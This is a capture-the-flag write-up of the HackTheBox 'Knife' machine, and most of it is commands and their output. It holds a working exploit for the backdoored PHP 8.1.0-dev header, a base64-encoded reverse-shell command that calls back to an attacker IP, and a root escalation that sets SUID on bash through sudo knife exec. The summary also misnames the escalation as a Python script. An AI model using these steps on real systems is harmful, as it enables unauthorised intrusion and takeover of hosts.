Hackthebox - Knife

HackTheBox - Knife

Summary

Knife was a easy linux hackthebox machine by author MrKN16H. Initial Foothold was using the recent php git server where someone committed a backdoor and tried to publish the backdoor-ed php. Using which we get a shell. and later we see an suid python script using which we get Root.

Initial Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.91 scan initiated Sun May 23 16:39:37 2021 as: nmap -v -sC -sV -oN nmap/knife 10.129.110.168
Nmap scan report for 10.129.110.168
Host is up (0.61s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 23 16:39:59 2021 -- 1 IP address (1 host up) scanned in 22.11 seconds

We see only two ports are open 22 and 80, from the SSH banner we know it is an Ubuntu box.

Lets start with web enumeration

Web

we see an static site to be present. Playing around the extension we see that it is an php file.

Lets start gobuster and we will poke around the website manually.

So I start gobuster with

1
gobuster dir  -b 403,404 -w "/opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt"  -u "http://10.129.110.168/" -x php -o knife.out

Checking the Web source we don’t see anything interesting.

and gobuster also was not showing anything interesting yet.

Lets add knife.htb as a vhost and see if we have anything different, which result in nothing different.

Lets run vhost enumeration and see if we find anything.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
gobuster vhost  -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt  -u http://knife.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://knife.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/23 16:57:23 Starting gobuster in VHOST enumeration mode
===============================================================

which also got me nothing.

back to manual enumeration we see an interesting header as X-Powered-By: PHP/8.1.0-dev

1
2
3
4
5
6
7
8
$ curl -sSL -D - http://knife.htb -o /dev/null
HTTP/1.1 200 OK
Date: Sun, 23 May 2021 11:25:19 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

seeing that i remember about reading an article about php git server being compromised and a backdoor being commited.

Googling around we find an article

The backdoor is really simple the server will execute the code on User-Agentt: header if the value start with zerodium.

We can Prove that this is the vurnebale version with

1
2
3
curl -s -H 'User-Agentt: zerodiumsystem("whoami");' "http://knife.htb/index.php"  | head -2
james
<!DOCTYPE html>

we can get a reverse shell using

1
curl -s -H 'User-Agentt: zerodiumsystem("echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk0LzQ0NDQgMD4mMSIK | base64 -d | bash");' "http://knife.htb/index.php"

and we get a reverse shell as james

Privilege Escalation

Running sudo -l revel

1
2
3
4
5
6
7
james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife

Lets run and see what that application is doing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
sudo knife
ERROR: You need to pass a sub-command (e.g., knife SUB-COMMAND)

Usage: knife sub-command (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
-E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message.

Available subcommands: (for details, knife SUB-COMMAND --help)

** CHEF ORGANIZATION MANAGEMENT COMMANDS **
knife opc org create ORG_SHORT_NAME ORG_FULL_NAME (options)
knife opc org delete ORG_NAME
knife opc org edit ORG
knife opc org list
<SNIP>

with a little google fu we see exec sub command

1
2
3
4
5
6
7
8
9
10
$ sudo knife exec
An interactive shell is opened

Type your script and do:

1. To run the script, use 'Ctrl D'
2. To exit, use 'Ctrl/Shift C'

Type here a script...
system('chmod +s /bin/bash')

Checking if we added suid on bash

1
2
3
4
5
6
7
8
9
james@knife:/opt/chef-workstation$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18 2020 /bin/bash
james@knife:/opt/chef-workstation$ /bin/bash -p
bash-5.0#
bash-5.0# whoami;hostname;date
root
knife
Sun May 23 12:08:30 UTC 2021
bash-5.0#

and we got root shell. :man-with-bunny-ears-partying:

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/knife/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.